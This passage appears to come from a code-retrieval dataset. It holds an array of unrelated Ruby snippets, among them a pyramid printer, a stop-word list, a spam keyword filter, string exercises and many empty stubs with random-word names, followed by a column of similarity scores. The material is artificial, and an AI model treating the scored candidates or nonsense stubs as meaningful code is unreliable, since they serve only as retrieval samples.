"def wtf_pyramid\n\n\t# Divide by 2 the number input to build the top of the pyramid\n\t$top = ($etages / 2)\n\n\ti = 1\n\tk = $top\n\tt = k + 5\n\n\t# Construct the pyramid from the top to the bottom\n\ti.upto(k) do t.times do\n\t \t\t\t\t\tprint ' '\n\t \t\t\t\t\t end\n\n\t # Print the *\n\t (2 * i - 1).times do\n\t\t\t\t\t\t print '*'\n\t\t\t\t\t\tend\n\t # Return the line for the next stair\n\t print \"\\n\"\n\n\t t -= 1\n\t i += 1\n\t end\n\n\t# Diff the number of stairs with the result above\n\t$bottom = ($etages - $top)\n\n\ti = $bottom\n\tk = 1\n\tt = 5\n\n\t# Construct the pyramid from the bottom to the top\n\ti.downto(k) do t.times do \n\t\t\t\t\t\t\t\tprint ' ' \n\t\t\t\t\t\t end\n\n\t # Print the *\n\t (2 * i - 1).times do \n\t \t\t\t\t\t\t\tprint '*'\n\t \t\t\t\t\tend\n\t \n\t # Return the line for the next stair\n\t print \"\\n\"\n\n\t t += 1\n\t i -= 1\n\tend\nend",
"def stop_words\n # Words taken from Jonathan Feinberg's cue.language (via jasondavies.com), see lib/cue.language/license.txt.\n \"i|me|my|myself|we|us|our|ours|ourselves|you|your|yours|yourself|yourselves|he|him|his|himself|she|her|hers|herself|it|its|itself|they|them|their|theirs|themselves|what|which|who|whom|whose|this|that|these|those|am|is|are|was|were|be|been|being|have|has|had|having|do|does|did|doing|will|would|should|can|could|ought|im|youre|hes|shes|its|were|theyre|ive|youve|weve|theyve|id|youd|hed|shed|wed|theyd|ill|youll|hell|shell|well|theyll|isnt|arent|wasnt|werent|hasnt|havent|hadnt|doesnt|dont|didnt|wont|wouldnt|shant|shouldnt|cant|cannot|couldnt|mustnt|lets|thats|whos|whats|heres|theres|whens|wheres|whys|hows|a|an|the|and|but|if|or|because|as|until|while|of|at|by|for|with|about|against|between|into|through|during|before|after|above|below|to|from|up|upon|down|in|out|on|off|over|under|again|further|then|once|here|there|when|where|why|how|all|any|both|each|few|more|most|other|some|such|no|nor|not|only|own|same|so|than|too|very|say|says|said|shall\"\nend",
"def strain; end",
"def chondromyxoma(buckshee, uncongenially_chiquitan)\n end",
"def insult_swabbie\n return case self.swab\n when :counter\n self.boatswain\n when :timestamp\n self.coxswain\n else\n \"\"\n end\n end",
"def wagner; end",
"def most_interesting_man_in_the_world; end",
"def take_bath\n #increment hygiene_points by 4\n #return string \"♪ Rub-a-dub just relaxing in the tub ♫\"..\n self.hygiene +=4\n return \"♪ Rub-a-dub just relaxing in the tub ♫\"\n end",
"def witcher; end",
"def mycelial_gristmilling()\n xenopteri_shebang(sectwise_cessor, ungular_pietism)\n end",
"def mitch_hedberg; end",
"def working_bikes\n bikes.reject { |bike| bike.broken? }\n end",
"def does_not_include_badwords\n\n badwords = %w(\n aloha!\n href=\n -online\n 1freewebspace.com\n 4u\n 5gighost.com\n accutane\n adipex\n adultsex\n advicer\n alprazolam\n amoxil\n arcadepages\n arimidex\n associations.missouristate.edu\n ativan\n augmentin\n baccarrat\n baclofen\n beaver\n blackjack\n bllogspot\n blogs.blackmarble.co.uk\n blowjob\n booker\n buspar\n byob\n car-rental-e-site\n car-rentals-e-site\n carisoprodol\n casino\n casinos\n chatroom\n cialis\n cipro\n citalopram\n clomid\n clonazepam\n comment1\n comment2\n comment3\n comment4\n comment5\n comment6\n coolcoolhu\n coolhu\n credit-card-debt\n credit-report-4u\n creditonlinepersonalloans\n cwas\n cyclen\n cyclobenzaprine\n dating-e-site\n day-trading\n debt-consolidation\n debt-consolidation-consultant\n diazepam\n diovan\n discreetordering\n dostinex\n duty-free\n dutyfree\n dvxuser.com\n equityloans\n fanreach.com\n fioricet\n flagyl\n flowers-leading-site\n fosamax\n freenet\n freenet-shopping\n gambling-\n hair-loss\n health-insurancedeals-4u\n hi5.com\n holdem\n holdempoker\n holdemsoftware\n holdemtexasturbowilson\n homeequityloans\n homefinance\n hotel-dealse-site\n hotele-site\n hotelse-site\n hydrocodone\n hyves.mn\n incest\n insurance-quotesdeals-4u\n insurancedeals-4u\n isuzuforums.com\n jestmaster\n jizz\n jrcreations\n kaboodle.com\n kamagra\n klonopin\n lamictal\n lesbian\n levaquin\n levitra\n lezbian\n loans\n lorazepam\n lycos\n macinstruct\n metformin\n metronidazole\n mortgage-4-u\n mortgagequotes\n musicstation\n nojazzfest\n nolvadex\n online-gambling\n onlinegambling-4u\n ottawavalleyag\n ownsthis\n palm-texas-holdem-game\n paxil\n paydal\n penguinforum\n penis\n personalloansbad\n pharmacy\n phenergan\n phentermine\n poker-chip\n porn\n poze\n profiles.friendster.com\n propecia\n proscar\n pussy\n remeron\n rental-car-e-site\n ringtone\n ringtones\n roulette\n shemale\n shoes\n slot-machine\n Staphcillin\n tamiflu\n tegretol\n texas-holdem\n thorcarlson\n top-e-site\n top-site\n toprol\n toradol\n tramadol\n tramodal\n tramodol\n trim-spa\n ultram\n valeofglamorganconservatives\n valium\n viagra\n vibramycin\n vicodin\n vioxx\n voltaren\n vytorin\n xanax\n zantac\n zithromax\n zofran\n zolpidem\n zolus\n )\n badwords.each do |bw|\n if !comment.nil? && comment.downcase.include?(bw) \n errors.add_to_base(\"Comment Rejected\") \n break\n end\n end\n end",
"def three_of_a_kind_better_kicker\n [5.♠, 7.♡, J.♠, J.♣, J.♢]\n end",
"def findrets(rol)\n give = rol.index(\"give\")\n here = rol.index(\"here\")\n return nil unless give\n \n if (here == nil or here < give)\n lastarg = rol.length() -1\n elsif (here > give)\n lastarg = here -1\n end\n (give+2..lastarg).each do |a|\n rol[a].gsub!(/\\W/,'')\n rol[a] = rol[a].to_sym\n end\n return nil if rol[give+2..lastarg].length == 0\n return rol[give+2..lastarg][0] if rol[give+2..lastarg].length == 1\n return rol[give+2..lastarg]\n end",
"def winter_olympics_sport; end",
"def war_sword # todo: check this matches when 5 are bought\n Regexp.new s_to_h(<<-S)\n B1 96 B1 D3 ED AE 5F 92 02 66 03 01 .. FF FF FF\n FF .. .. .. .. 31 19 01 0B 01 00 00 00 10 00 00\n 00 4E 00 00 00 00 00 00 00 01 00 00 00 00 00 00\n 00 02 00 00 00 02 00 00 00 99 32 C5 C4 CC 57 6D\n 43 9F 6B 03 01 FF FF FF FF 99 32 C5 C4 CC 57 6D\n 43 27 9E 00 01 FF FF FF FF 01 00 00 00 99 32 C5\n C4 CC 57 6D 43 27 9E 00 01 FF FF FF FF 13 00 00\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 00 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00\n 00\n S\nend",
"def work_out\n self.happiness += 2\n self.hygiene -= 3\n return \"♪ another one bites the dust ♫\" \n end",
"def sluggish_octopus(fishes)\r\n biggest_fish = \"\"\r\n\r\n fishes.each_with_index do |fish1, idx1|\r\n fishes.each_with_index do |fish2, idx2|\r\n if idx2 > idx1\r\n if fish2.length > biggest_fish.length\r\n biggest_fish << fish2\r\n end\r\n end\r\n end\r\n end\r\n return biggest_fish\r\nend",
"def strange_words(words)\n i = 0\n new_array = []\n new_string = \"\"\n\n while i < words.length\n\n \tnew_string = words[i]\n\n if (words[i].length < 6 ) && !(new_string[0] == \"e\") || (new_string[0] == \"e\") && !(words[i].length < 6 )\n new_array << words[i] \n end\n i += 1\n end\n return new_array\n\nend",
"def suivre; end",
"def wip\n end",
"def unusual_sport; end",
"def half_wind; end",
"def romeo_and_juliet_quote; end",
"def broken_parts\n page_elements.select { |pe| pe.embeddable.nil? }\n end",
"def folge_berechnen(tn,jahr)\n folge = [ \"\" ]\n ges_einsaetze = \"28.12.#{jahr}\".to_date.cweek\n ger_schalter = 1\n namen = prio_bilden(tn,folge,ges_einsaetze,ger_schalter)\n zaehler = 0\n while folge.size <= ges_einsaetze\n namen.each do |name|\n unless tn[name].find_index(folge.size) || folge.size > ges_einsaetze\n folge << name\n zaehler += 1\n end\n end\n if zaehler == 0\n if namen.size < tn.size && ger_schalter == 1\n ger_schalter = 0\n else\n folge << \"nicht besetzt!\"\n ger_schalter = 1\n end\n end\n zaehler = 0\n namen = prio_bilden(tn,folge,ges_einsaetze,ger_schalter)\n end\n return folge \n end",
"def big_bad; end",
"def half_wind_abbreviation; end",
"def clever_octopus(the_sea)\n longest = the_sea[0]\n\n the_sea.each do |fish|\n if fish.length > longest.length\n longest = fish\n end\n end\n\n longest\nend",
"def ibu; end",
"def whiny; end",
"def functioning_bikes\n bikes.reject {|bike| bike.broken?}\n end",
"def silly_talk(str)\n vows = \"aeiou\"\n\n new_talk = str.split(\" \").map do |wrd|\n if vows.include?(wrd[-1].downcase)\n wrd + wrd[-1]\n else\n silly = wrd.split(\"\").map do |char|\n if vows.include?(char)\n char + \"b\" + char\n else\n char\n end\n end\n silly.join(\"\")\n end\n end\n\n new_talk.join(\" \")\nend",
"def whisper_words(words)\n\twhisper = words.map { |word| word.downcase + \"...\"}\n \treturn whisper\nend",
"def rassoc(p0) end",
"def whisper_words(words)\n\treturn words.map { |word| word.downcase + \"...\" }\nend",
"def Text2Words(txt, len, where, offset)\n txt.each do |words|\n print \" { { \" \n words.each do |word|\n if word==\"ET\" then\n pos = where.index(\"TERTAUQ\")\n else\n pos = where.index(word.reverse) || where.index(word) \n end\n print \" { %3d, %2d }, \" % [pos+offset, word.length ]\n end\n (len - words.length).times do\n print \" { %3d, %2d }, \" % [0, 0 ]\n end\n puts \" } }, // \" + words.join(\" \")\n end\nend",
"def gluck; end"
] |
[
"0.58298665",
"0.5742944",
"0.56979156",
"0.56977946",
"0.5666964",
"0.55777055",
"0.55777055",
"0.55611366",
"0.55526954",
"0.55372494",
"0.5510455",
"0.5493631",
"0.5468806",
"0.54391176",
"0.5425024",
"0.5424866",
"0.54151016",
"0.54151016",
"0.53829825",
"0.53829825",
"0.53829825",
"0.5375268",
"0.5361594",
"0.53563416",
"0.53430897",
"0.5342348",
"0.53342396",
"0.53342396",
"0.5331595",
"0.53149354",
"0.5311532",
"0.5297725",
"0.52942985",
"0.52691066",
"0.52550465",
"0.524625",
"0.5229186",
"0.5221891",
"0.52150154",
"0.5213231",
"0.5202859",
"0.52022105",
"0.5201586",
"0.51987636",
"0.51893723",
"0.5183028",
"0.5183028",
"0.51499015",
"0.51437837",
"0.51437837",
"0.51437837",
"0.5137755",
"0.51375467",
"0.5136649",
"0.5127192",
"0.5126818",
"0.5124088",
"0.51233363",
"0.512196",
"0.51217115",
"0.5120818",
"0.51139116",
"0.5112114",
"0.5106213",
"0.5105473",
"0.5102341",
"0.5088354",
"0.50881684",
"0.50765544",
"0.5073688",
"0.50714856",
"0.50692695",
"0.50680685",
"0.50637406",
"0.50627625",
"0.50618285",
"0.5057631",
"0.50513655",
"0.50463414",
"0.50441456",
"0.5043794",
"0.5038508",
"0.5032629",
"0.50303984",
"0.50278497",
"0.50265944",
"0.5019292",
"0.5018566",
"0.49994367",
"0.4998698",
"0.49924847",
"0.49900314",
"0.49864468",
"0.4986103",
"0.49842623",
"0.49712545",
"0.49696267",
"0.49686947",
"0.49658802",
"0.49641076",
"0.49545425"
] |
0.0
|
-1
|
Storing the node in a hash to track its working value
|
def assign_node(char)
  assigned = false
  @worker_obj.each do |k, node|
    break if assigned
    # A nil slot means this worker is idle and can take the task.
    unless node
      # Remaining time is the task's base cost plus the fixed per-task overhead.
      @worker_obj[k] = [char, NUM_TO_INT_MAP[char] + ADDITIONAL_SECONDS]
      @nodes_being_worked_on << char
      assigned = true
    end
  end
end
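
A minimal sketch of the scaffolding assign_node appears to rely on. NUM_TO_INT_MAP, ADDITIONAL_SECONDS, @worker_obj, and @nodes_being_worked_on are not defined in the snippet, so the shapes below are assumptions (a task-scheduling setup in the style of Advent of Code 2018, day 7 part 2).

class Scheduler
  # Assumed: task 'A' costs 1 second, 'B' costs 2, ..., plus a fixed overhead.
  NUM_TO_INT_MAP = ('A'..'Z').each_with_index.to_h { |c, i| [c, i + 1] }
  ADDITIONAL_SECONDS = 60

  def initialize(worker_count)
    # One slot per worker id; nil marks an idle worker.
    @worker_obj = (1..worker_count).to_h { |id| [id, nil] }
    @nodes_being_worked_on = []
  end

  # Advance time by one second and free any workers that finished.
  def tick
    @worker_obj.each do |k, node|
      next unless node
      node[1] -= 1
      @worker_obj[k] = nil if node[1] <= 0
    end
  end
end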
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def node_hash(node_id)\n \n end",
"def []=(node, value)\n return @hash[node.sha1] = value\n end",
"def hash\n node_id.hash\n end",
"def hash # Hack for Ruby 1.8.6\n @node.id.hash ^ self.class.hash\n end",
"def recalculate_hash_at(node)\n return node._hash = node.value if node.value\n recalculate_hash_at(node.left) if node.left\n recalculate_hash_at(node.right) if node.right\n node._hash = self.class.hash_children(*node_subhashes(node))\n end",
"def calculate_hash!\n prefix = PREFIX_NAME_LOOKUP[self.type]\n # add special cases for refs\n self.hash_id = NodeId.sha1(\"#{prefix} #{self.size}\\0#{self.content}\")\n end",
"def hash\n @hash || @hash = (value.hash * -1)\n end",
"def hash\n @node.sort.push(@edge).hash\n end",
"def hash() end",
"def hash() end",
"def hash() end",
"def hash() end",
"def hash() end",
"def hash() end",
"def hash() end",
"def store(key, value)\n mon_synchronize do\n node = (@hash[key] ||= Node.new(key))\n node.value = value\n touch(node)\n compact!\n node.value\n end\n end",
"def root_hash\n self.node_hash root_node_id\n end",
"def update_hash\n nh = nil\n\n if is_branch != 0\n sha512 = OpenSSL::Digest::SHA512.new\n sha512 << HASH_+PREFIXES[:inner_node]\n hashes.each { |k,h|\n sha512 << v\n }\n nh = sha512.digest\n end\n\n return false if nh == self.hash\n self.hash = nh\n return true\n end",
"def hash\n\t\tvalue.hash\n\tend",
"def correct_node_hash(node_id)\n SpStore::Crypto.hash_for_tree_node node_id, node_hash(left_child(node_id)),\n node_hash(right_child(node_id))\n end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def hash; end",
"def [](node)\n return @hash[node.sha1]\n end",
"def roothash\n root_node._hash || recalculate_hash_at(root_node)\n end",
"def hash\n 0\n end",
"def hash\n value.hash\n end",
"def serializable_hash\n @node = links.any? ? super.merge(_links: links) : super\n end",
"def hash(key); end",
"def put key, value\n\t\t\t# if the key already exists, \n\t\t\tif @my_hash.has_key? key\n\t\t\t\t@my_hash[key].value = value\n\t\t\telse\n\t\t\t\t# if the list is full, remove the last node to create one spot for a new one\n\t\t\t\tif @my_hash.length == @max_size\n\t\t\t\t\tdeleted_key = @my_list.remove_last\n\t\t\t\t\t@my_hash.delete deleted_key\n\t\t\t\tend\n\t\t\t\t# create a new node in the list\n\t\t\t\t# store this node in the hash\n\t\t\t\tif @my_hash.length < @max_size\n\t\t\t\t\t@my_hash[key] = @my_list.add_to_first key, value\n\t\t\t\tend\n\t\t\tend\n\t\t\treturn @my_hash\n\t\tend",
"def hash\n @value.hash\n end",
"def hash\r\n @_hash ||= _hash\r\n end",
"def hash\n self.state.hash\n end",
"def hash\n end",
"def hash\n end",
"def hash\n end",
"def hash()\n #This is a stub, used for indexing\n end",
"def hash\n value_id.hash\n end",
"def get key\n\t\t\tif @my_hash.has_key? key\n\t\t\t\tnode = @my_hash[key]\n\t\t\t\t@my_list.promote_node node\n\t\t\t\tnode.value\n\t\t\telse\n\t\t\t\tnil\n\t\t\tend\n\t\tend",
"def hash\n [value].hash\n end",
"def hash\n [value].hash\n end",
"def initialize\n @nodes_hash = Hash.new\n end",
"def hash(*) end",
"def hash\n state.hash\n end",
"def hash\n state.hash\n end",
"def change(hash); end",
"def hash\n type.hash ^ (id.hash >> 1)\n end",
"def hash_code; end",
"def hash\n @hash || calculate_hash!\n end",
"def hash\n @hash\n end",
"def set(item, node)\n\t\t\t@hash[item] = node\n\t\tend",
"def update_node!(node)\n @store.remove(node.key)\n @store.append(node.key, node.val)\n end",
"def store(calling_node, key, value)\n @router.touch(calling_node)\n return false unless key.class == DataKey\n @values[key.to_bin] = value\n return true\n end",
"def rehash() end",
"def hash\n num = @high << 64\n num |= @low\n num.hash\n end",
"def set(key, value)\n @semaphore.synchronize do\n node = Node.new(key, value)\n return false if value.value.length > @max_bytes\n\n if empty?\n @head_node = node\n @tail_node = node\n @hashed_storage[key] = node\n return node\n end\n while value.value.length + used_bytes > @max_bytes\n @hashed_storage.delete(@head_node.key)\n @head_node = @head_node.previous_node\n @head_node.next_node = nil if @head_node \n end\n node.next_node = @tail_node\n @tail_node.previous_node = node\n @tail_node = node\n @hashed_storage[key] = node\n end\n value\n end",
"def geohash(key, member); end",
"def hash=(_arg0); end",
"def add(item)\n\t\t\t@hash[item] = Node.new\n\t\tend",
"def hash\n element.hash\n end",
"def hash\r\n id.hash\r\n end",
"def save_hashes\n @storage.save_hash_tree @hash_tree_controller.node_hashes\n end",
"def serializable_hash\n return nil if @object.nil?\n @node = attributes\n include_links!\n # include_associations! if _embed\n @node\n end",
"def add_node(key, val)\n @store.append(key, val)\n end",
"def hash\n @hash.hash\n end",
"def hash\n [_hash, name, owner].hash\n end",
"def hash\n h = @e.nil? ? 0 : @e\n h = (h << 1) ^ @r.hash\n h = (h << 1) ^ @v.hash\n end",
"def root_hash\n self[1]\n end",
"def hash\n self.class.hash ^ @ns.hash\n end",
"def hash\n\t\t\t@path.hash\n\t\tend",
"def node_hash_from_node(ast)\n hash = {}\n ast.children.each { |cn| hash[cn.children[0]] = cn.children[1] }\n hash\n end",
"def hash\n -element.hash\n end",
"def node_to_hash(node)\n puts \"You must define a `node_to_hash` method in your child class to parse the Nokogiri nodes\"\n end",
"def hash\n @symbols.hash + 37*positive?.hash\n end",
"def hash\n super ^ number.hash\n end",
"def test_equal_hash\n chain = \"Person1<Person2(360):Person3<Person4(930)\"\n block = Blockchain.new(0,0,chain, 1.5,\"ch77\")\n block.setHash(\"ch77\")\n\n assert_equal(1, block.check_curr())\n end",
"def hash\n shasum.hash\n end",
"def hash\n shasum.hash\n end",
"def hash\n shasum.hash\n end",
"def to_hash\n call\n @hash = @value\n @hash\n end",
"def hash\n @id.hash\n end",
"def hash_id\n @hid\n end",
"def hash\n self.class.hash ^ operand.hash\n end",
"def add(hash); end",
"def hash()\n #This is a stub, used for indexing\nend",
"def hash\n @vbits.hash\n end",
"def hash\n @hash ||= self.to_a.hash\n end",
"def add_node(node)\n nodes[node.value] = node\n end",
"def hash() source.hash ^ (target.hash+1); end",
"def hash() source.hash ^ (target.hash+1); end",
"def hash\n size.hash ^ rank.hash\n end",
"def []=(key, value)\n root_node._hash = nil # reset pre-calculated roothash\n node = root_node\n ba_key = Bitarray.new(key)\n\n # finds or creates the node\n 1.upto(KEY_SIZE) do |depth|\n bit = ba_key[depth - 1]\n node =\n if bit == 0\n # 0, descend left\n node.left ||= (node.left = Node.new(key, depth))\n else\n # 1, descend right\n node.right ||= (node.right = Node.new(key, depth))\n end\n end\n node.value = value\n end",
"def hash\n @hash ||= begin\n result = 17\n result = 31 * result + self.class.hash\n result = 31 * result + ord\n result.is_a?(Fixnum) ? result : result.hash\n end\n end",
"def hash\n @hash ||= begin\n result = 17\n result = 31 * result + self.class.hash\n result = 31 * result + ord\n result.is_a?(Fixnum) ? result : result.hash\n end\n end"
] |
[
"0.73474973",
"0.729175",
"0.72454065",
"0.7098122",
"0.68676984",
"0.6843846",
"0.6769423",
"0.6703186",
"0.6587155",
"0.6587155",
"0.6587155",
"0.6587155",
"0.6587155",
"0.6587155",
"0.6587155",
"0.65726817",
"0.6541691",
"0.6469588",
"0.64603823",
"0.6431214",
"0.6384501",
"0.6384501",
"0.6384501",
"0.6384501",
"0.6384501",
"0.6384501",
"0.6384501",
"0.6384501",
"0.6384501",
"0.6384501",
"0.6367511",
"0.6341428",
"0.63392353",
"0.6325385",
"0.63023704",
"0.62718755",
"0.62471735",
"0.6244659",
"0.6231332",
"0.6217329",
"0.61970747",
"0.61970747",
"0.61970747",
"0.6187663",
"0.6172414",
"0.61602473",
"0.6155317",
"0.6155317",
"0.6145848",
"0.61347663",
"0.6132625",
"0.6132625",
"0.61286306",
"0.61113954",
"0.6090848",
"0.60648316",
"0.6058776",
"0.60501826",
"0.60396606",
"0.60129464",
"0.59932005",
"0.598771",
"0.5982686",
"0.5965857",
"0.5941219",
"0.5936024",
"0.59357345",
"0.5925525",
"0.59184563",
"0.5902275",
"0.5900883",
"0.5892239",
"0.5888436",
"0.58564436",
"0.5853809",
"0.58361727",
"0.5833578",
"0.5830824",
"0.58297795",
"0.58131236",
"0.581228",
"0.5801524",
"0.5793647",
"0.5792787",
"0.5792787",
"0.5792787",
"0.57915574",
"0.5784893",
"0.57825977",
"0.57765317",
"0.5776304",
"0.5776069",
"0.57702327",
"0.57686394",
"0.57683176",
"0.57674164",
"0.57674164",
"0.5757451",
"0.5745413",
"0.57442605",
"0.57442605"
] |
0.0
|
-1
|
Removing a node and all stored edges that include it
|
def remove_node(node)
@nodes_being_worked_on.delete(node)
@nodes.delete(node)
  # without this guard, the dependent of the final remaining edge would never be assigned, so handle that case before pruning
assign_node(@edges[0][1]) if @edges.size == 1
@edges.reject! { |edge| edge.include?(node) }
end
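
A self-contained sketch of the same pruning step, assuming @edges is an array of [prerequisite, dependent] pairs, as the @edges[0][1] indexing above implies; the class and method names are illustrative.

class DependencyGraph
  def initialize(edges)
    @edges = edges
    @nodes = edges.flatten.uniq
  end

  # Drop a completed node and every edge that touches it.
  def remove_node(node)
    @nodes.delete(node)
    @edges.reject! { |edge| edge.include?(node) }
  end

  # Nodes with no remaining prerequisites are ready to be worked on.
  def available
    @nodes.reject { |n| @edges.any? { |_pre, dep| dep == n } }
  end
end

g = DependencyGraph.new([["C", "A"], ["C", "F"], ["A", "B"]])
g.remove_node("C")
p g.available # => ["A", "F"]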
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def remove(node)\n node.inputs.each do |producer_edge|\n producer_edge.from.outputs.reject! { |edge| edge.to == node }\n end\n\n node.outputs.each do |consumer_edge|\n consumer_edge.to.inputs.reject! { |edge| edge.from == node }\n end\n\n nodes.delete(node)\n end",
"def remove_node_if\n #_clear_cache #done in clear_node(node)\n all = self.nodes\n all.each do |node|\n if yield node then\n self.clear_node(node)\n @pathway.graph.delete(node)\n end\n end\n self\n end",
"def remove_nonsense_nodes\n _clear_cache\n hash = {}\n self.each_node do |node|\n hash[node] = true if @pathway.graph[node].size == 2\n end\n hash.each_key do |node|\n adjs = @pathway.graph[node].keys\n edges = @pathway.graph[node].values\n new_edge = get_edge_merged(edges[0], edges[1])\n @pathway.graph[adjs[0]].delete(node)\n @pathway.graph[adjs[1]].delete(node)\n @pathway.graph.delete(node)\n @pathway.append(Bio::Relation.new(adjs[0], adjs[1], new_edge))\n end\n #@pathway.to_relations\n @pathway.relations.reject! do |rel|\n hash[rel.node[0]] or hash[rel.node[1]]\n end\n return hash.keys\n end",
"def erase\n @nodes.erase\n end",
"def pull_edges_of(node)\n\t\t\teach_node do |other|\n\t\t\t\tremove_edge(node, other)\n\t\t\t\tremove_edge(other, node)\n\t\t\tend\n\t\tend",
"def remove_node(node)\n\t\t\tif has_node?(node)\n\t\t\t\tpull_edges_of(node)\n\t\t\t\t@nodes.delete(node)\n\t\t\t\t@order -= 1\n\t\t\tend\n\t\t\tself\n\t\tend",
"def node_remove(node)\n return unless node_present? node\n nodes.delete prepare_key(node)\n end",
"def remove_from_graph\n # Ignores trying to delete nonexistent records\n connection.execute <<-EOS\n DELETE IGNORE FROM #{oqgraph_table_name} WHERE origid = #{self.send(self.class.from_key)} AND destid = #{self.send(self.class.to_key)};\n EOS\n end",
"def remove!(node)\n super\n key_to_node.delete(node.key)\n self\n end",
"def remove(node)\n # Traverse looking for the node\n sets = []\n prev_link = nil\n each_link do |link|\n if link[:ref_id] == node.id\n sets << [prev_link, link]\n next # in case adjacent removal node links\n end\n prev_link = link\n end\n # Now we can just do the join and we're out\n sets.each do |prev_link, the_link|\n if prev_link\n prev_link[:next_id] = the_link[:next_id]\n else\n self[:head_id] = the_link[:next_id]\n end\n # Mark removal\n element_removed!\n end\n # Return the node if any were removed\n node unless sets.empty?\n end",
"def destroy\n super do\n graph.delete [source.to_term, nil, nil]\n parent.delete [parent, nil, source.to_term]\n end\n end",
"def remove_node(node)\n raise KeyError, \"Error in deleting node #{node} from Graph.\" unless @nodes.key?(node)\n\n neighbours = @adj[node]\n neighbours.each_key { |k| @pred[k].delete(node) }\n @pred[node].each_key do |k|\n @adj[k].delete(node)\n end\n\n @pred.delete(node)\n @adj.delete(node)\n @nodes.delete(node)\n end",
"def node\n purge_node[:node]\n end",
"def remove(node)\n end",
"def clear_vertex\n for rel in sorted_relations\n rel.remove(self)\n end\n\tend",
"def delete!\n graph.remove_edge element\n end",
"def delete!\n graph.remove_edge element\n end",
"def remove(name)\n lock\n read\n @inv.each_pair { |_group, nodes|\n nodes.delete(name)\n }\n save!\n unlock\n end",
"def delete!\n graph.remove_vertex self\n end",
"def eject!\n #removes the first node\n node = @store.first\n @store.remove(node.key)\n\n #get rid of the map's reference to the deleted node\n @map.delete(node.key)\n end",
"def delete_node(node)\n ## just copy the information of the next node and then cut it out\n node.id = node.next.id\n node.next = node.next.next\nend",
"def remove_edge_if #:yields: source, target, edge\n _clear_cache\n removed_rel = []\n @pathway.relations.delete_if do |rel|\n if yield rel.node[0], rel.node[1], rel.edge then\n removed_rel << rel\n true\n end\n end\n removed_rel.each do |rel|\n source = rel.node[0]\n target = rel.node[1]\n h = @pathway.graph[source]\n h.delete(target) if h\n h = @pathway.graph[target]\n h.delete(source) if h\n end\n self\n end",
"def remove_lonely_nodes\n @nodes.delete_if { |n| (@sourcelinks[n].empty? && @destlinks[n].empty?) }\n self\n end",
"def delete_edge!(from, to)\n protected_delete_edge!(from, to)\n protected_delete_edge!(to, from)\n @edge_number -= 1\n end",
"def inline\n @out.delete(self)\n @in.each do |n|\n i = 0\n while(i < n.out.length)\n n.out[i,1] = @out if n.out[i] == self\n i += 1\n end\n end\n @graph.remove(self)\n end",
"def delete(node)\n remove_node(node)\n end",
"def disconnect(edge)\n #adj_v.delete(vertex)\n in_edges.delete(edge)\n end",
"def delete_edge(from, to)\n @edges_cost[from].delete to\n @edges_up[from].delete to\n end",
"def remove(node)\n if link = Likewise::Link.find_by_id(key_for(node))\n remove_link(link)\n element_removed!\n element_decremented!(link[:weight])\n end\n node.context = link\n node\n end",
"def clear_node(node)\n if node != nil\n @visited_actors.clear\n end\n end",
"def remove_edge(id1, id2)\n # YOUR WORK HERE\n end",
"def clean_neo4j\n neo_connection.execute_query(\"START n0=node(0),nx=node(*) MATCH n0-[r0?]-(),nx-[rx?]-() WHERE nx <> n0 DELETE r0,rx,nx\")\nend",
"def delete_vertex(vertex)\n out_e = self[vertex].out_edges.to_a\n out_e.each { |e| delete_edge(vertex, e) }\n in_e = self[vertex].in_edges.to_a\n in_e.each { |e| delete_edge(e, vertex) }\n self.delete(vertex)\n end",
"def delete!\n graph.removeEdge element\n end",
"def delete_edge!(from, to)\n protected_delete_edge!(from, to)\n @edge_number -= 1\n end",
"def prune\n @set.clear\n end",
"def remove_edge(from, to)\n\t\t\t@size -= 1 if disconnect(from, to)\n\t\t\tself\n\t\tend",
"def delete\n self.class.fire_event(NodeDeletedEvent.new(self))\n relations.each {|r| r.delete}\n @internal_node.delete\n lucene_index.delete(neo_node_id)\n end",
"def forget_dependencies_for(object)\n @graph.delete_edges_to(object)\n end",
"def cleanup_phi_nodes\n nodes.dup.each do |node| # dup because we're mutating\n next unless node.is_a?(PhiNode)\n\n if node.inputs.size == 1\n # Remove phi nodes with a single input.\n connect_over(node)\n remove(node)\n elsif node.inputs.map(&:from).uniq.size == 1\n # Remove phi nodes where all inputs are the same.\n producer_edge = node.inputs.first\n consumer_edge = node.outputs.find { |e| !e.to.is_a?(MergeNode) }\n connect(\n producer_edge.from,\n consumer_edge.to,\n :data,\n consumer_edge.label\n )\n remove(node)\n end\n end\n end",
"def omit_degree_2_nodes\r\n # add all nodes into a queue\r\n # queue = put all nodes from @nodes into the queue\r\n # puts \"#{@vertices}\"\r\n queue = Queue.new\r\n @vertices.each do |node|\r\n queue << node\r\n end\r\n\r\n # iterate through all nodes until queue is not empty\r\n while ! queue.empty?\r\n # take the first node number from the queue\r\n # i = queue.deque()\r\n # take the first node itself\r\n node=queue.pop\r\n\r\n # puts \"osm_id=#{node.osm_id} degree=#{node.degree}\"\r\n # puts \"node neighbours #{node.neighbours}\"\r\n # do anything only iff this node's degree == 2\r\n if node.degree == 2\r\n # take the node's neighbours and the two edges going from the node\r\n # we would like to shrink these two edges into only one while isolating\r\n # the _node_\r\n v1_nr = node.neighbours[0]\r\n e1_nr = node.edges[0]\r\n v2_nr = node.neighbours[1]\r\n e2_nr = node.edges[1]\r\n\r\n #puts \"actual node: #{node.osm_id} , actual neighbours #{v1_nr} , #{v1_nr}\"\r\n #puts \"neigbours of #{node.osm_id}: #{v1_nr.osm_id} #{v2_nr.osm_id}\" if (node.neighbours.length==2)\r\n next if node.neighbours.length!=2\r\n\r\n # IMPORTANT!\r\n # however, if there was a cycle, which means that the node's neighbours\r\n # ARE already connected, do nothing and leave this degree-2-node _i_ as\r\n # it is!\r\n\r\n #puts \"are connected #{v1_nr}, #{v2_nr} of #{node.osm_id}?\"\r\n next if are_connected(v1_nr, v2_nr, node.osm_id)\r\n\r\n #puts \"handling #{node.osm_id} - has 2 and is not cyclic, going to delete neighbours!\"\r\n #puts \"cur_node is: 